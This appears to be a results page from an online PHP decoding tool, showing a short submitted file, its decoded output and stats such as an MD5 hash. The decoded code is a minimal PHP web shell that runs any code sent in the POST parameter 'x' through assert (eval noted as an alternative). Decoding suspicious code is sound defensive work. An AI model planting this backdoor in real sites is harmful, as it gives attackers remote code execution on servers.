Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a='assert'; //$a='eval'; $a($_POST[x]); ?> ..
Decoded Output download
<?php
$a='assert'; //$a='eval';
$a($_POST[x]);
?>
Did this file decode correctly?
Original Code
<?php
$a='assert'; //$a='eval';
$a($_POST[x]);
?>
Function Calls
None |
Stats
MD5 | e5c0b190ca7843a95c7a8bc0e03d03be |
Eval Count | 0 |
Decode Time | 92 ms |